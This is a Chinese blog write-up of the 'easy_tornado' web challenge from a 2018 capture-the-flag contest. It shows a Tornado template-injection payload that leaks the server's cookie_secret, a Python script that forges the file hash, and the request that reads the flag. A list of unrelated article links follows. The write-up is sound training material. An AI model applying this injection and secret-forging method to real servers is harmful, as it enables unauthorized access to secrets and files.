当前位置: 首页 > news >正文

[护网杯 2018]easy_tornado1

题目

依次点击文件查看

/flag.txt

flag in /fllllllllllllag

/welcome.txt

render

/hints.txt

md5(cookie_secret+md5(filename))

 tornado模板注入

报cookie

/error?msg={{handler.settings}}

 

 'cookie_secret': '6647062b-e68d-4406-90d3-06e307fa955c'}

使用python脚本进行加密

import hashlib  #选用哈希模块
filename = '/fllllllllllllag'  #文件名
cookie_secret = '6647062b-e68d-4406-90d3-06e307fa955c'#cookie_secret值
filename = hashlib.md5(filename.encode()).hexdigest()#/fllllllllllllag进行32位小写哈希md5加密
a = cookie_secret + filename#md5值进行拼接
filehash = hashlib.md5(a.encode()).hexdigest()#计算拼接后的md5值的md532小写的值
print(filehash)#输出加密后的md532位小写的值

生成

8585e1e95118edc46fe41838cbce8b45

payload

/file?filename=/fllllllllllllag&filehash=8585e1e95118edc46fe41838cbce8b45

 

拿下flag

flag{90ad064b-7371-4b21-af8a-429f484e3466} 

http://www.lryc.cn/news/526857.html

相关文章:

  • 关于java实现word(docx、doc)转html的解决方案
  • 【8】思科IOS AP升级操作
  • 【ROS2】RViz2界面类 VisualizationFrame 详解
  • 2025年01月24日Github流行趋势
  • Gradle buildSrc模块详解:集中管理构建逻辑的利器
  • 【Airsim 仿真】查找配置文件 settings json 的路径优先级
  • 【FreeRTOS 教程 四】队列创建与发布项目到队列
  • STM32项目分享:智能厨房安全检测系统
  • 2025美赛数学建模MCM/ICM选题建议与分析,思路+模型+代码
  • 高并发问题的多维度解决之道
  • Ubuntu环境 nginx 源码 编译安装
  • K8S中的数据存储之基本存储
  • 编码器和扩散模型
  • PAT甲级-1024 Palindromic Number
  • FS8405 Release FS0B
  • IGBT的损耗计算的学习【2025/1/24】
  • Unity|小游戏复刻|见缝插针1(C#)
  • No.1|Godot|俄罗斯方块复刻|棋盘和初始方块的设置
  • SSM框架探秘:Spring 整合 SpringMVC 框架
  • 2025.1.20——二、buuctf BUU UPLOAD COURSE 1 1 文件上传
  • 【架构面试】三、高可用高性能架构设计
  • 11.渲染管线——光栅化阶段
  • 【数据分享】1929-2024年全球站点的逐月平均能见度(Shp\Excel\免费获取)
  • 二叉树的深度
  • MySQL命令及用法(精华版)
  • R语言学习笔记之高效数据操作
  • 将 OneLake 数据索引到 Elasticsearch - 第二部分
  • Linux——冯 • 诺依曼体系结构
  • Java进阶(一)
  • appium自动化环境搭建